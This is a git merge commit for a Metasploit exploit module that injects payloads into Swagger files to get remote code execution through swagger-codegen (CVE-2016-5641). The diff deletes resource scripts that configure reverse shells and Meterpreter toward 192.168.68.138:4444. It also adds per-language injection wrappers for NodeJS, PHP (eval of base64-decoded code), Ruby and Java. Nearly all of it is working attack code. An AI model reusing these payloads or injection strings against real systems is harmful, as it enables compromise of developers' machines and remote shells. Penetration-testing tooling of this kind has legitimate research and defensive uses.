Merge pull request #3 from todb-r7/return-of-multiarch

Return of multiarch: LGTM. thank you! @wchen-r7 @egypt @todb-r7 !
2016-06-23 16:00:33 -04:00
parent 47674c77ad ff741fbc35
commit 0fd83b50d1
6 changed files with 51 additions and 57 deletions
@@ -1,11 +0,0 @@
-set PAYLOAD java/jsp_shell_reverse_tcp 
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_LOC "PATH"
-set PAYLOAD_PREFIX "a\\\"; "
-
-set LHOST 192.168.68.138 
-set LPORT 4444
-
-run 
@@ -1,13 +0,0 @@
-set PAYLOAD nodejs/shell_reverse_tcp
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set INFO_VERSION "1.0.0"
-set PAYLOAD_LOC "PATH"
-set PAYLOAD_PREFIX "/a');};};return exports;}));"
-set PAYLOAD_SUFFIX "(function(){}(this,function(){a=function(){b=function(){new Array('"
-
-set LHOST 192.168.68.138 
-set LPORT 4444
-
-run 
@@ -1,11 +0,0 @@
-set PAYLOAD php/meterpreter/reverse_tcp 
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_PREFIX "*/ namespace foobar; eval(base64_decode('"
-set PAYLOAD_SUFFIX "')); /*"
-
-set LHOST 192.168.68.138 
-set LPORT 4444
-
-run 
@@ -1,12 +0,0 @@
-set PAYLOAD ruby/shell_reverse_tcp 
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_LOC "INFO_TITLE"
-set PAYLOAD_PREFIX "=end "
-set INFO_DESCRIPTION "=begin "
-
-set LHOST 192.168.68.138 
-set LPORT 4444
-
-run 
@@ -16,6 +16,8 @@ require 'msf/core'

 class MetasploitModule < Msf::Exploit::Remote

+  Rank = ExcellentRanking
+
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
@@ -40,21 +42,26 @@ class MetasploitModule < Msf::Exploit::Remote
          [ 'URL', 'http://github.com/swagger-api/swagger-codegen' ],
          [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641' ]
        ],
-      'Platform'       => %w{ nodejs },
-      'Arch'           => ARCH_NODEJS,
-      'Targets'        => [['Automatic', {}]],
+      'Platform'       => %w{ nodejs php java ruby },
+      'Arch'           => [ ARCH_NODEJS, ARCH_PHP, ARCH_JAVA, ARCH_RUBY ],
+      'Targets'        => [
+        ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS } ],
+        ['PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP } ],
+        ['Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA } ],
+        ['Ruby', { 'Platform' => 'ruby', 'Arch' => ARCH_RUBY } ]
+        ],
      'DisclosureDate' => 'Jun 23 2016',
      'DefaultTarget'  => 0))

    register_options(
      [
+        OptString.new('FILENAME', [false, 'The file to write.', 'msf-swagger.json']),
        OptAddress.new('LHOST', [true, 'Server IP or hostname that the swagger codegen will callback to.']),
        OptPort.new('LPORT', [true, 'Server port.']),
        OptString.new('PAYLOAD_PREFIX', [false, 'Payload Injection prefix', '']),
        OptString.new('PAYLOAD_SUFFIX', [false, 'Payload Injection suffix', '']),
-        OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point', 'INFO_DESCRIPTION', ['INFO_DESCRIPTION', 'INFO_VERSION', 'INFO_TITLE', 'SWAGGER_HOST', 'BASE_PATH', 'PATH', 'PATH_DESRIPTION', 'PATH_RESPONSE_DESCRIPTION', 'DEFINITION_DESCRIPTION'] ]),
        OptString.new('INFO_DESCRIPTION', [true, 'Swagger info description', 'A']),
-        OptString.new('INFO_VERSION', [true, 'Swagger info version.', 'B']),
+        OptString.new('INFO_VERSION', [true, 'Swagger info version.', '1.0.0']),
        OptString.new('INFO_TITLE', [true, 'Swagger info title.', 'C']),
        OptEnum.new('SWAGGER_SCHEME', [true, 'Protocol scheme', 'http', ['http','https','ws','wss']]),
        OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4']),
@@ -118,12 +125,46 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    # NodeJS only, for now.
-    wrapped_payload = datastore['PAYLOAD_PREFIX'] +
-                      payload.encoded + datastore['PAYLOAD_SUFFIX']
-    datastore[datastore['PAYLOAD_LOC']] = wrapped_payload.gsub(/"/, '\\"')
+    if datastore['PAYLOAD']
+      case payload.arch[0]
+      when 'nodejs'
+        payload_loc = 'PATH'
+        payload_prefix = "/a');};};return exports;}));"
+        payload_suffix = "(function(){}(this,function(){a=function(){b=function(){new Array('"
+        wrapped_payload = payload_prefix +
+          payload.encoded +
+          payload_suffix
+        datastore[payload_loc] = wrapped_payload.gsub(/"/, '\\"')
+      when 'php'
+        payload_loc = 'INFO_DESCRIPTION'
+        payload_prefix = "*/ namespace foobar; eval(base64_decode('"
+        payload_suffix = "')); /*"
+        wrapped_payload = payload_prefix +
+          Base64.strict_encode64(payload.encoded) +
+          payload_suffix
+        datastore[payload_loc] = wrapped_payload
+      when 'ruby'
+        payload_loc = 'INFO_TITLE'
+        payload_prefix = "=end "
+        payload_suffix = "=begin "
+        wrapped_payload = payload_prefix +
+          payload.encoded +
+          payload_suffix
+        datastore[payload_loc] = wrapped_payload
+      when 'java'
+        payload_loc = 'PATH'
+        payload_prefix = %q{a\\\"; "}
+        p = payload.encoded.gsub(/<%@page import="/, 'import ')
+        p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '')
+        p = p.gsub(/"/, '\\"').gsub(/\n/, ' ')
+        wrapped_payload = datastore['PAYLOAD_PREFIX'] + p
+        datastore[payload_loc] = wrapped_payload
+      end
+    else
+      print_error("No payload defined!")
+    end
+
    print_status swagger
    file_create swagger
  end
-
 end